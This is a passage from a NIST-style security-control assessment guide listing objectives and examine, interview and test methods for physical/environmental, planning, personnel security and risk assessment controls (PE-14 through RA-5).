| PE-14.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization regularly maintains, within acceptable levels, the temperature and humidity within the facility where the information system resides; and | |
| (ii) the organization regularly monitors the temperature and humidity within the facility where the information system resides. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing temperature and humidity control; facility housing the information system; temperature and humidity controls; temperature and humidity controls documentation; temperature and humidity records; other relevant documents or records]. (L) (M) (H) |
| ASSESSMENT PROCEDURE | |
| PE-15 | WATER DAMAGE PROTECTION |
| Control: The organization protects the information system from water damage resulting from broken plumbing lines or other sources of water leakage by providing master shutoff valves that are accessible, working properly, and known to key personnel. | |
| Supplemental Guidance: None. | |
| PE-15.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization protects the information system from water damage resulting from broken plumbing lines or other sources of water leakage by providing master shutoff valves that are accessible and working properly; and | |
| (ii) key personnel within the organization have knowledge of the master water shutoff values. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing water damage protection; facility housing the information system; master shutoff values; list of key personnel with knowledge of location and activation procedures for master shutoff values for the plumbing system; master shutoff value documentation; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organization personnel with physical and environmental protection responsibilities]. (M) (H) | |
| Test: [SELECT FROM: Master water-shutoff valves, process for activating master water-shutoff]. (M) (H) | |
| PE-15(1) | WATER DAMAGE PROTECTION |
| Control Enhancement: | |
| The organization employs mechanisms that, without the need for manual intervention, protect the information system from water damage in the event of a significant water leak. | |
| PE-15(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs mechanisms that, without the need for manual intervention, protect the information system from water damage in the event of a significant water leak. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing water damage protection; facility housing the information system; automated mechanisms for water shutoff valves; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing master water shutoff valve activation]. (H) |
| ASSESSMENT PROCEDURE | |
| PE-16 | DELIVERY AND REMOVAL |
| Control: The organization authorizes and controls information system-related items entering and exiting the facility and maintains appropriate records of those items. | |
| Supplemental Guidance: The organization controls delivery areas and, if possible, isolates the areas from the information system and media libraries to avoid unauthorized physical access. | |
| PE-16.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization authorizes and controls information system-related items (i.e., hardware, firmware, software) entering and exiting the facility; and | |
| (ii) the organization maintains appropriate records of items entering and exiting the facility. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing delivery and removal of information system components from the facility; facility housing the information system; records of items entering and exiting the facility; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organization personnel with tracking responsibilities for information system components entering and exiting the facility]. (M) (H) | |
| Test: [SELECT FROM: Process for controlling information system-related items entering and exiting the facility]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| PE-17 | ALTERNATE WORK SITE |
| Control: The organization employs appropriate management, operational, and technical information system security controls at alternate work sites. | |
| Supplemental Guidance: The organization provides a means for employees to communicate with information system security staff in case of security problems. NIST Special Publication 800-46 provides guidance on security in telecommuting and broadband communications. | |
| PE-17.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs appropriate management, operational, and technical information system security controls at alternate work sites. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing alternate work sites for organizational personnel; list of management, operational, and technical security controls required for alternate work sites; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organization personnel using alternate work sites]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| PE-18 | LOCATION OF INFORMATION SYSTEM COMPONENTS |
| Control: The organization positions information system components within the facility to minimize potential damage from physical and environmental hazards and to minimize the opportunity for unauthorized access. | |
| Supplemental Guidance: Physical and environmental hazards include, for example, flooding, fire, tornados, earthquakes, hurricanes, acts of terrorism, vandalism, electrical interference, and electromagnetic radiation. Whenever possible, the organization also considers the location or site of the facility with regard to physical and environmental hazards. | |
| PE-18.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization positions information system components within the facility to minimize potential damage from physical and environmental hazards; and | |
| (ii) the organization positions information system components within the facility to minimize the opportunity for unauthorized access. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing positioning of information system components; documentation providing the location and position of information system components within the facility; other relevant documents or records]. (M) (H) | |
| PE-18(1) | LOCATION OF INFORMATION SYSTEM COMPONENTS |
| Control Enhancement: | |
| The organization plans the location or site of the facility where the information system resides with regard to physical and environmental hazards and for existing facilities, considers the physical and environmental hazards in its risk mitigation strategy. | |
| PE-18(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization plans the location or site of the facility where the information system resides with regard to physical and environmental hazards; and | |
| (ii) the organization, for existing facilities, considers the physical and environmental hazards in its risk mitigation strategy. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; physical site planning documents; organizational assessment of risk, contingency plan; other relevant documents or records]. (H) | |
| Interview: [SELECT FROM: Organization personnel with site selection responsibilities for the facility housing the information system]. (H) |
| ASSESSMENT PROCEDURE | |
| PE-19 | INFORMATION LEAKAGE |
| Control: The organization protects the information system from information leakage due to electromagnetic signals emanations. | |
| Supplemental Guidance: The FIPS 199 security categorization (for confidentiality) of the information system and organizational security policy guides the application of safeguards and countermeasures employed to protect the information system against information leakage due to electromagnetic signals emanations. | |
| PE-19.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization protects the information system from information leakage due to electromagnetic signals emanations. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Physical and environmental protection policy; procedures addressing information leakage due to electromagnetic signals emanations; mechanisms protecting the information system against electronic signals emanation; facility housing the information system; records from electromagnetic signals emanation tests; other relevant documents or records]. | |
| Test: [SELECT FROM: Information system for information leakage due to electromagnetic signals emanations]. |
FAMILY:
Planning
| ASSESSMENT PROCEDURE | |
| PL-1 | SECURITY PLANNING POLICY AND PROCEDURES |
| Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, security planning policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the security planning policy and associated security planning controls. | |
| Supplemental Guidance: The security planning policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The security planning policy addresses the overall policy requirements for confidentiality, integrity, and availability and can be included as part of the general information security policy for the organization. Security planning procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-18 provides guidance on security planning. NIST Special Publication 800-12 provides guidance on security policies and procedures. | |
| PL-1.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization develops and documents security planning policy and procedures; | |
| (ii) the organization disseminates security planning policy and procedures to appropriate elements within the organization; | |
| (iii) responsible parties within the organization periodically review security planning policy and procedures; and | |
| (iv) the organization updates security planning policy and procedures when organizational review indicates updates are required. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Security planning policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with security planning responsibilities]. (H) | |
| PL-1.2 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the security planning policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance; | |
| (ii) the security planning policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and | |
| (iii) the security planning procedures address all areas identified in the security planning policy and address achieving policy-compliant implementations of all associated security planning controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Security planning policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with security planning responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| PL-2 | SYSTEM SECURITY PLAN |
| Control: The organization develops and implements a security plan for the information system that provides an overview of the security requirements for the system and a description of the security controls in place or planned for meeting those requirements. Designated officials within the organization review and approve the plan. | |
| Supplemental Guidance: The security plan is aligned with the organization's information system architecture and information security architecture. NIST Special Publication 800- 18 provides guidance on security planning. | |
| PL-2.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization develops and implements a security plan for the information system; | |
| (ii) the security plan provides an overview of the security requirements for the information system and a description of the security controls planned or in place for meeting the security requirements; | |
| (iii) the organization defines in the security plan, explicitly or by reference, the values for all organization-defined parameters (i.e., assignment and selection operations) in applicable security controls and control enhancements; | |
| (iv) the security plan development is consistent with NIST Special Publication 800-18; | |
| (v) the security plan is consistent with the organization's information system architecture and information security architecture; and | |
| (vi) designated organizational officials review and approve the security plan. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Security planning policy; procedures addressing security plan development and implementation; NIST Special Publication 800-18; security plan for the information system; other relevant documents or records]. (L) (M) (H) |
| ASSESSMENT PROCEDURE | |
| PL-3 | SYSTEM SECURITY PLAN UPDATE |
| Control: The organization reviews the security plan for the information system [Assignment: organization-defined frequency, at least annually] and revises the plan to address system/organizational changes or problems identified during plan implementation or security control assessments. | |
| Supplemental Guidance: Significant changes are defined in advance by the organization and identified in the configuration management process. NIST Special Publication 800-18 provides guidance on security plan updates. | |
| PL-3.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the frequency of security plan reviews/updates and the frequency is at least annually; | |
| (ii) the organization updates the security plan in accordance with organization-defined frequency; | |
| (iii) the organization defines in the update to the security plan, explicitly or by reference, the values for all organization-defined parameters (i.e., assignment and selection operations) in applicable updated security controls and control enhancements; | |
| (iv) the organization receives input to update the security plan from the organization's configuration management and control process; and | |
| (v) the updated security plan reflects the information system and organizational changes or problems identified during the implementation of the plan or the assessment of the security controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Security planning policy; procedures addressing security plan updates; security plan; configuration management policy and procedures; configuration management documents; security plan for the information system; record of security plan reviews and updates; other relevant documents or records]. (L) (M) (H) |
| ASSESSMENT PROCEDURE | |
| PL-4 | RULES OF BEHAVIOR |
| Control: The organization establishes and makes readily available to all information system users, a set of rules that describes their responsibilities and expected behavior with regard to information and information system usage. The organization receives signed acknowledgement from users indicating that they have read, understand, and agree to abide by the rules of behavior, before authorizing access to the information system and its resident information. | |
| Supplemental Guidance: Electronic signatures are acceptable for use in acknowledging rules of behavior unless specifically prohibited by organizational policy. NIST Special Publication 800-18 provides guidance on preparing rules of behavior. | |
| PL-4.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization establishes a set of rules that describe user responsibilities and expected behavior with regard to information and information system usage; | |
| (ii) the organization makes the rules available to all information system users; | |
| (iii) the rules of behavior for organizational personnel are consistent with NIST Special Publication 800-18; and | |
| (iv) the organization receives a signed acknowledgement from users indicating that they have read, understand, and agree to abide by the rules of behavior, before authorizing access to the information system and its resident information. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Security planning policy; procedures addressing rules of behavior for information system users; NIST Special Publication 800-18; rules of behavior; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel who are authorized users of the information system and have signed rules of behavior]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| PL-5 | PRIVACY IMPACT ASSESSMENT |
| Control: The organization conducts a privacy impact assessment on the information system in accordance with OMB policy. | |
| Supplemental Guidance: OMB Memorandum 03-22 provides guidance for implementing the privacy provisions of the E-Government Act of 2002. | |
| PL-5.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization conducts a privacy impact assessment on the information system; and | |
| (ii) the privacy impact assessment is compliant with OMB policy. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Security planning policy; procedures addressing privacy impact assessments on the information system; appropriate federal legislation and OMB policy; privacy impact assessment; other relevant documents or records]. (L) (M) (H) |
| ASSESSMENT PROCEDURE | |
| PL-6 | SECURITY-RELATED ACTIVITY PLANNING |
| Control: The organization plans and coordinates security-related activities affecting the information system before conducting such activities in order to reduce the impact on organizational operations (i.e., mission, functions, image, and reputation), organizational assets, and individuals. | |
| Supplemental Guidance: Routine security-related activities include, but are not limited to, security assessments, audits, system hardware and software maintenance, security certifications, and testing/exercises. Organizational advance planning and coordination includes both emergency and non-emergency (i.e., routine) situations. | |
| PL-6.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization plans and coordinates security-related activities affecting the information system before conducting such activities in order to reduce the impact on organizational operations, organizational assets, and individuals; and | |
| (ii) the organization's advance planning and coordination of security-related activities includes both emergency and non-emergency situations. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Security planning policy; procedures addressing security-related activity planning for the information system; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with security planning and plan implementation responsibilities]. (M) (H) |
FAMILY:
Personnel Security
| ASSESSMENT PROCEDURE | |
| PS-1 | PERSONNEL SECURITY POLICY AND PROCEDURES |
| Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, personnel security policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the personnel security policy and associated personnel security controls. | |
| Supplemental Guidance: The personnel security policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The personnel security policy can be included as part of the general information security policy for the organization. Personnel security procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures. | |
| PS-1.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization develops and documents personnel security policy and procedures; | |
| (ii) the organization disseminates personnel security policy and procedures to appropriate elements within the organization; | |
| (iii) responsible parties within the organization periodically review personnel security policy and procedures; and | |
| (iv) the organization updates personnel security policy and procedures when organizational review indicates updates are required. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Personnel security policy and procedures, other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with personnel security responsibilities]. (H) | |
| PS-1.2 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the personnel security policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance; | |
| (ii) the personnel security policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and | |
| (iii) the personnel security procedures address all areas identified in the personnel security policy and address achieving policy-compliant implementations of all associated personnel security controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Personnel security policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with personnel security responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| PS-2 | POSITION CATEGORIZATION |
| Control: The organization assigns a risk designation to all positions and establishes screening criteria for individuals filling those positions. The organization reviews and revises position risk designations [Assignment: organization-defined frequency]. | |
| Supplemental Guidance: Position risk designations are consistent with 5 CFR 731.106(a) and Office of Personnel Management policy and guidance. | |
| PS-2.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization assigns a risk designations to all positions within the organization; | |
| (ii) the organization establishes a screening criteria for individuals filling organizational positions; | |
| (iii) the risk designations for the organizational positions are consistent with 5 CFR 731.106(a) and OPM policy and guidance; | |
| (iv) the organization defines in the security plan, explicitly or by reference, the frequency of risk designation reviews and updates for organizational positions; and | |
| (v) the organization reviews and revises position risk designations in accordance with the organization-defined frequency. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Personnel security policy; procedures addressing position categorization; appropriate codes of federal regulations; OPM policy and guidance; list of risk designations for organizational positions; security plan; records of risk designation reviews and updates; other relevant documents or records]. (L) (M) (H) |
| ASSESSMENT PROCEDURE | |
| PS-3 | PERSONNEL SCREENING |
| Control: The organization screens individuals requiring access to organizational information and information systems before authorizing access. | |
| Supplemental Guidance: Screening is consistent with: (i) 5 CFR 731.106; (ii) Office of Personnel Management policy, regulations, and guidance; (iii) organizational policy, regulations, and guidance; (iv) FIPS 201 and Special Publications 800-73, 800-76, and 800-78; and (v) the criteria established for the risk designation of the assigned position. | |
| PS-3.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization screens individuals requiring access to organizational information and information systems prior to authorizing access; and | |
| (ii) the personnel screening is consistent with 5 CFR 731.106, OPM policy, regulations, and guidance, FIPS 201 and NIST Special Publications 800-73, 800-76, and 800- 78, and the criteria established for the risk designation for the assigned position. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Personnel security policy; procedures addressing personnel screening; records of screened personnel; FIPS 201; NIST Special Publications 800-73, 800-76, and 800-78; other relevant documents or records]. (L) (M) (H) |
| ASSESSMENT PROCEDURE | |
| PS-4 | PERSONNEL TERMINATION |
| Control: The organization, upon termination of individual employment, terminates information system access, conducts exit interviews, retrieves all organizational information system-related property, and provides appropriate personnel with access to official records created by the terminated employee that are stored on organizational information systems. | |
| Supplemental Guidance: Information system-related property includes, for example, keys, identification cards, and building passes. Timely execution of this control is particularly essential for employees or contractors terminated for cause. | |
| PS-4.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization terminates information system access upon termination of individual employment; | |
| (ii) the organization conducts exit interviews of terminated personnel; | |
| (iii) the organization retrieves all organizational information system-related property from terminated personnel; and | |
| (iv) the organization retains access to official documents and records on organizational information systems created by terminated personnel. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Personnel security policy; procedures addressing personnel termination; records of personnel termination actions; list of information system accounts; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with personnel security responsibilities]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| PS-5 | PERSONNEL TRANSFER |
| Control: The organization reviews information systems/facilities access authorizations when personnel are reassigned or transferred to other positions within the organization and initiates appropriate actions. | |
| Supplemental Guidance: Appropriate actions that may be required include: (i) returning old and issuing new keys, identification cards, building passes; (ii) closing old accounts and establishing new accounts; (iii) changing system access authorizations; and (iv) providing for access to official records created or controlled by the employee at the old work location and in the old accounts. | |
| PS-5.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization reviews information systems/facilities access authorizations when personnel are reassigned or transferred to other positions within the organization; and | |
| (ii) the organization initiates appropriate actions (e.g., reissuing keys, identification cards, building passes; closing old accounts and establishing new accounts; and changing system access authorization) for personnel reassigned or transferred within the organization. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Personnel security policy; procedures addressing personnel transfer; records of personnel transfer actions; list of information system and facility access authorizations; other relevant documents or records]. (L) (M) (H) |
| ASSESSMENT PROCEDURE | |
| PS-6 | ACCESS AGREEMENTS |
| Control: The organization completes appropriate signed access agreements for individuals requiring access to organizational information and information systems before authorizing access and reviews/updates the agreements [Assignment: organization- defined frequency]. | |
| Supplemental Guidance: Access agreements include, for example, nondisclosure agreements, acceptable use agreements, rules of behavior, and conflict-of-interest agreements. Electronic signatures are acceptable for use in acknowledging access agreements unless specifically prohibited by organizational policy. | |
| PS-6.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization requires appropriate access agreements for individuals requiring access to organizational information and information systems before authorizing access; | |
| (ii) organizational personnel sign appropriate access agreements prior to receiving access; | |
| (iii) the organization defines in the security plan, explicitly or by reference, the frequency of reviews/updates for access agreements; and | |
| (iv) the organization reviews/updates the access agreements in accordance with the organization-defined frequency. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Personnel security policy; procedures addressing access agreements for organizational information and information systems; security plan; access agreements; records of access agreement reviews and updates; other relevant documents or records]. (L) (M) (H) |
| ASSESSMENT PROCEDURE | |
| PS-7 | THIRD-PARTY PERSONNEL SECURITY |
| Control: The organization establishes personnel security requirements including security roles and responsibilities for third-party providers and monitors provider compliance. | |
| Supplemental Guidance: Third-party providers include, for example, service bureaus, contractors, and other organizations providing information system development, information technology services, outsourced applications, and network and security management. The organization explicitly includes personnel security requirements in acquisition-related documents. NIST Special Publication 800-35 provides guidance on information technology security services. | |
| PS-7.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization establishes personnel security requirements, including security roles and responsibilities, for third-party providers (e.g., service bureaus, contractors, and other organizations providing information system development, information technology services, outsourced applications, network and security management); | |
| (ii) the organization explicitly includes personnel security requirements in acquisition- related documents in accordance with NIST Special Publication 800-35; and | |
| (iii) the organization monitors third-party provider compliance with personnel security requirements. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Personnel security policy; procedures addressing third-party personnel security; list of personnel security requirements; acquisition documents; compliance monitoring process; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with personnel security responsibilities; third-party providers]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| PS-8 | PERSONNEL SANCTIONS |
| Control: The organization employs a formal sanctions process for personnel failing to comply with established information security policies and procedures. | |
| Supplemental Guidance: The sanctions process is consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The sanctions process can be included as part of the general personnel policies and procedures for the organization. | |
| PS-8.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization employs a formal sanctions process for personnel failing to comply with established information security policies and procedures; and | |
| (ii) the personnel sanctions process is consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Personnel security policy; procedures addressing personnel sanctions; rules of behavior; records of formal sanctions; other relevant documents or records]. (L) (M) (H) |
FAMILY:
Risk Assessment
| ASSESSMENT PROCEDURE | |
| RA-1 | RISK ASSESSMENT POLICY AND PROCEDURES |
| Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented risk assessment policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the risk assessment policy and associated risk assessment controls. | |
| Supplemental Guidance: The risk assessment policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The risk assessment policy can be included as part of the general information security policy for the organization. Risk assessment procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publications 800-30 provides guidance on the assessment of risk. NIST Special Publication 800-12 provides guidance on security policies and procedures. | |
| RA-1.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization develops and documents risk assessment policy and procedures; | |
| (ii) the organization disseminates risk assessment policy and procedures to appropriate elements within the organization; | |
| (iii) responsible parties within the organization periodically review risk assessment policy and procedures; and | |
| (iv) the organization updates risk assessment policy and procedures when organizational review indicates updates are required. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Risk assessment policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with risk assessment responsibilities]. (H) | |
| RA-1.2 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the risk assessment policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance; | |
| (ii) the risk assessment policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and | |
| (iii) the risk assessment procedures address all areas identified in the risk assessment policy and address achieving policy-compliant implementations of all associated risk assessment controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Risk assessment policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with risk assessment responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| RA-2 | SECURITY CATEGORIZATION |
| Control: The organization categorizes the information system and the information processed, stored, or transmitted by the system in accordance with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance and documents the results (including supporting rationale) in the system security plan. Designated senior-level officials within the organization review and approve the security categorizations. | |
| Supplemental Guidance: The applicable federal standard for security categorization of nonnational security information and information systems is FIPS 199. The organization conducts FIPS 199 security categorizations as an organization-wide activity with the involvement of the chief information officer, senior agency information security officer, information system owners, and information owners. The organization also considers potential impacts to other organizations and, in accordance with the USA PATRIOT Act of 2001 and Homeland Security Presidential Directives, potential national-level impacts in categorizing the information system. As part of a defense-in-depth protection strategy, the organization considers partitioning higher-impact information systems into separate physical domains (or environments) and restricting or prohibiting network access in accordance with an organizational assessment of risk. NIST Special Publication 800-60 provides guidance on determining the security categories of the information types resident on the information system. Related security controls: MP-4, SC-7. | |
| RA-2.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization conducts the security categorization of the information system as an organization-wide exercise with the involvement of senior-level officials including, but not limited to, authorizing officials, information system owners, chief information officer, senior agency information security officer, and mission/information owners; | |
| (ii) the security categorization is consistent with FIPS 199 and considers the provisional impact levels and special factors in NIST Special Publication 800-60; | |
| (iii) the organization considers in the security categorization of the information system, potential impacts to other organizations and, in accordance with the USA PATRIOT Act of 2001 and Homeland Security Presidential Directives, potential national-level impacts; | |
| (iv) the organization includes supporting rationale for impact-level decisions as part of the security categorization; and | |
| (v) designated, senior-level organizational officials review and approve the security categorizations. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Risk assessment policy; procedures addressing security categorization of organizational information and information systems; security planning policy and procedures; FIPS 199; NIST Special Publication 800-60; security plan; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with security categorization and risk assessment responsibilities]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| RA-3 | RISK ASSESSMENT |
| Control: The organization conducts assessments of the risk and magnitude of harm that could result from the unauthorized access, use, disclosure, disruption, modification, or destruction of information and information systems that support the operations and assets of the agency (including information and information systems managed/operated by external parties). | |
| Supplemental Guidance: Risk assessments take into account vulnerabilities, threat sources, and security controls planned or in place to determine the resulting level of residual risk posed to organizational operations, organizational assets, or individuals based on the operation of the information system. The organization also considers potential impacts to other organizations and, in accordance with the USA PATRIOT Act and Homeland Security Presidential Directives, potential national-level impacts in categorizing the information system. Risk assessments also take into account risk posed to organizational operations, organizational assets, or individuals from external parties (e.g., service providers, contractors operating information systems on behalf of the organization, individuals accessing organizational information systems, outsourcing entities). In accordance with OMB policy and related E-authentication initiatives, authentication of public users accessing federal information systems may also be required to protect nonpublic or privacy-related information. As such, organizational assessments of risk also address public access to federal information systems. The General Services Administration provides tools supporting that portion of the risk assessment dealing with public access to federal information systems. NIST Special Publication 800-30 provides guidance on conducting risk assessments including threat, vulnerability, and impact assessments. | |
| RA-3.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization assesses the risk and magnitude of harm that could result from the unauthorized access, use, disclosure, disruption, modification, or destruction of information and information systems that support its operations and assets (including information and information systems managed/operated by external parties); and | |
| (ii) the risk assessment is consistent with the NIST Special Publication 800-30. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Risk assessment policy; security planning policy and procedures; procedures addressing organizational assessments of risk; risk assessment; NIST Special Publication 800-30; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with risk assessment responsibilities]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| RA-4 | RISK ASSESSMENT UPDATE |
| Control: The organization updates the risk assessment [Assignment: organization-defined frequency] or whenever there are significant changes to the information system, the facilities where the system resides, or other conditions that may impact the security or accreditation status of the system. | |
| Supplemental Guidance: The organization develops and documents specific criteria for what is considered significant change to the information system. NIST Special Publication 800-30 provides guidance on conducting risk assessment updates. | |
| RA-4.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the frequency of risk assessment updates; | |
| (ii) the organization develops and documents specific criteria for what is considered significant change to the information system, the facilities where the system resides, or other conditions that may impact the security or accreditation status of the system; | |
| (iii) the organization updates the risk assessment in accordance with the organization- defined frequency or whenever there are significant changes to the information system, the facilities where the system resides, or other conditions that may impact the security or accreditation status of the system; and | |
| (iv) the risk assessment update is consistent with the NIST Special Publications 800-30. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Risk assessment policy; security planning policy and procedures; procedures addressing risk assessment updates; risk assessment; security plan; records of risk assessment updates; NIST Special Publication 800-30; other relevant documents or records]. (L) (M) (H) |
| ASSESSMENT PROCEDURE | |
| RA-5 | VULNERABILITY SCANNING |
| Control: The organization scans for vulnerabilities in the information system [Assignment: organization-defined frequency] or when significant new vulnerabilities potentially affecting the system are identified and reported. | |
| Supplemental Guidance: Vulnerability scanning is conducted using appropriate scanning tools and techniques. The organization trains selected personnel in the use and maintenance of vulnerability scanning tools and techniques. Vulnerability scans are scheduled and/or random in accordance with organizational policy and assessment of risk. The information obtained from the vulnerability scanning process is freely shared with appropriate personnel throughout the organization to help eliminate similar vulnerabilities in other information systems. Vulnerability analysis for custom software and applications may require additional, more specialized approaches (e.g., vulnerability scanning tools for applications, source code reviews, static analysis of source code). NIST Special Publication 800-42 provides guidance on network security testing. NIST Special Publication 800-40 (Version 2) provides guidance on patch and vulnerability management. | |
